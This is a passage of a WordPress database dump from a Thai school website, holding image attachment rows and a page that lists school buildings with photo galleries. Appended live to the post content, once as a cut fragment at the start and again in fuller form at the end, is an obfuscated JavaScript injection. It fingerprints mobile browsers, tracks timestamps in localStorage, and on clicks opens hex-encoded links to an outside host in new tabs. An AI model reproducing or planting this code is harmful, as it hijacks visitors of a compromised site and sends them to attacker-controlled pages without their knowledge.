ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','ข้อมูลสิ่งก่อสร้าง','','inherit','closed','closed','','609-revision-v1','','','2024-08-07 11:40:34','2024-08-07 04:40:34','',609,'http://pakhaeng.ssk.in.th/?p=628',0,'revision','',0),
(630,1,'2024-08-07 11:42:53','2024-08-07 04:42:53','','S__62119953_0','','inherit','','closed','','s__62119953_0','','','2024-08-07 11:42:53','2024-08-07 04:42:53','',609,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119953_0.jpg',0,'attachment','image/jpeg',0),
(631,1,'2024-08-07 11:42:55','2024-08-07 04:42:55','','S__62119955_0','','inherit','','closed','','s__62119955_0','','','2024-08-07 11:42:55','2024-08-07 04:42:55','',609,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119955_0.jpg',0,'attachment','image/jpeg',0),
(632,1,'2024-08-07 11:42:57','2024-08-07 04:42:57','','S__62119956_0','','inherit','','closed','','s__62119956_0','','','2024-08-07 11:42:57','2024-08-07 04:42:57','',609,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119956_0.jpg',0,'attachment','image/jpeg',0),
(633,1,'2024-08-07 11:43:00','2024-08-07 04:43:00','','S__62119945_0','','inherit','','closed','','s__62119945_0','','','2024-08-07 11:43:00','2024-08-07 04:43:00','',609,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119945_0.jpg',0,'attachment','image/jpeg',0),
(634,1,'2024-08-07 11:43:51','2024-08-07 04:43:51','','S__62119974_0','','inherit','','closed','','s__62119974_0','','','2024-08-07 11:43:51','2024-08-07 04:43:51','',609,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119974_0.jpg',0,'attachment','image/jpeg',0),
(635,1,'2024-08-07 11:43:52','2024-08-07 04:43:52','','S__62119976_0','','inherit','','closed','','s__62119976_0','','','2024-08-07 11:43:52','2024-08-07 04:43:52','',609,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119976_0.jpg',0,'attachment','image/jpeg',0),
(636,1,'2024-08-07 11:43:54','2024-08-07 04:43:54','','S__62119977_0','','inherit','','closed','','s__62119977_0','','','2024-08-07 11:43:54','2024-08-07 04:43:54','',609,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119977_0.jpg',0,'attachment','image/jpeg',0),
(637,1,'2024-08-07 11:44:46','2024-08-07 04:44:46','<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n\n<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:kadence/advancedgallery {\"uniqueID\":\"609_e70354-bb\",\"ids\":[620,617,618,619],\"type\":\"slider\",\"imagesDynamic\":[{\"id\":620,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=620\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119942_0.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119942_0-1024x576.jpg\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119942_0.jpg\",\"width\":750,\"height\":422},{\"id\":617,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=617\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119960_0.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119960_0-1024x576.jpg\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119960_0.jpg\",\"width\":750,\"height\":422},{\"id\":618,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=618\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119962_0.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119962_0-1024x576.jpg\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119962_0.jpg\",\"width\":750,\"height\":422},{\"id\":619,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=619\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119963_0.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119963_0-1024x576.jpg\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119963_0.jpg\",\"width\":750,\"height\":422}],\"kbVersion\":2} /-->\n\n<!-- wp:paragraph -->\n<p>อคาพิเศษ 1 ชั้น</p>\n<!-- /wp:paragraph --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:kadence/advancedgallery {\"uniqueID\":\"609_7a2fca-b5\",\"ids\":[622,621],\"type\":\"slider\",\"imagesDynamic\":[{\"id\":622,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=622\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119948_0-1.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119948_0-1-1024x576.jpg\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119948_0-1.jpg\",\"width\":750,\"height\":422},{\"id\":621,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=621\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119969.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119969-1024x576.jpg\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119969.jpg\",\"width\":750,\"height\":422}],\"kbVersion\":2} /-->\n\n<!-- wp:paragraph -->\n<p>อาคารเรียน สปช. 105/29 ปรับปรุง 2 ชั้น 4 ห้องเรียน (ชั้นล่างโล่ง)</p>\n<!-- /wp:paragraph --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n\n<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:kadence/advancedgallery {\"uniqueID\":\"609_72c110-54\",\"ids\":[610,613,612],\"type\":\"slider\",\"imagesDynamic\":[{\"id\":610,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=610\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119951.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119951-1024x576.jpg\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119951.jpg\",\"width\":1024,\"height\":576},{\"id\":613,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=613\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119967_0.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119967_0-1024x576.jpg\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119967_0.jpg\",\"width\":750,\"height\":422},{\"id\":612,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=612\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119966_0.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119966_0-1024x576.jpg\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119966_0.jpg\",\"width\":750,\"height\":422}],\"kbVersion\":2} /-->\n\n<!-- wp:paragraph -->\n<p>อาคารเรียน สปช. 104/26 ขนาด 3 ห้องเรียน</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"609_e7f603-c8\",\"ids\":[625,623,624],\"type\":\"slider\",\"imagesDynamic\":[{\"id\":625,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=625\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119950_0.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119950_0-1024x576.jpg\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119950_0.jpg\",\"width\":750,\"height\":422},{\"id\":623,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=623\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119968.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119968-1024x576.jpg\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119968.jpg\",\"width\":750,\"height\":422},{\"id\":624,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=624\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119970.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119970-1024x576.jpg\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119970.jpg\",\"width\":750,\"height\":422}],\"kbVersion\":2} /-->\n\n<!-- wp:paragraph -->\n<p>อาคารห้องสมุด</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"609_7b340e-23\",\"ids\":[633,630,631,632],\"type\":\"slider\",\"imagesDynamic\":[{\"id\":633,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=633\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119945_0.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119945_0-1024x576.jpg\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119945_0.jpg\",\"width\":1024,\"height\":576},{\"id\":630,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=630\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119953_0.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119953_0-1024x576.jpg\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119953_0.jpg\",\"width\":1024,\"height\":576},{\"id\":631,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=631\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119955_0.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119955_0-1024x576.jpg\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119955_0.jpg\",\"width\":1024,\"height\":576},{\"id\":632,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=632\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119956_0.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119956_0-1024x576.jpg\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119956_0.jpg\",\"width\":1024,\"height\":576}],\"kbVersion\":2} /-->\n\n<!-- wp:paragraph -->\n<p>สปช.301/26 (บ้านพักครูเดี่ยว)</p>\n<!-- /wp:paragraph --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:kadence/advancedgallery {\"uniqueID\":\"609_f12de5-af\",\"ids\":[616,614,615],\"type\":\"slider\",\"imagesDynamic\":[{\"id\":616,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=616\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119943_0.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119943_0-1024x576.jpg\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119943_0.jpg\",\"width\":750,\"height\":422},{\"id\":614,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=614\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119957_0.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119957_0-1024x576.jpg\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119957_0.jpg\",\"width\":1024,\"height\":576},{\"id\":615,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=615\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119959_0.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119959_0-1024x576.jpg\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119959_0.jpg\",\"width\":1024,\"height\":576}],\"kbVersion\":2} /-->\n\n<!-- wp:paragraph -->\n<p>อาคารเรียนอนุบาล</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"609_e50add-00\",\"ids\":[626,627],\"type\":\"slider\",\"imagesDynamic\":[{\"id\":626,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=626\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119971_0.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119971_0-1024x576.jpg\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119971_0.jpg\",\"width\":750,\"height\":422},{\"id\":627,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=627\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119973_0.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119973_0-1024x576.jpg\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119973_0.jpg\",\"width\":750,\"height\":422}],\"kbVersion\":2} /-->\n\n<!-- wp:paragraph -->\n<p>ห้องน้ำ สปช.601/26</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"609_5f7dc9-b0\",\"ids\":[634,635,636],\"type\":\"slider\",\"imagesDynamic\":[{\"id\":634,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=634\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119974_0.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119974_0-1024x576.jpg\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119974_0.jpg\",\"width\":750,\"height\":422},{\"id\":635,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=635\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119976_0.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119976_0-1024x576.jpg\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119976_0.jpg\",\"width\":750,\"height\":422},{\"id\":636,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=636\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119977_0.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119977_0-1024x576.jpg\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119977_0.jpg\",\"width\":750,\"height\":422}],\"kbVersion\":2} /-->\n\n<!-- wp:paragraph -->\n<p>สปช.601/26</p>\n<!-- /wp:paragraph --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( 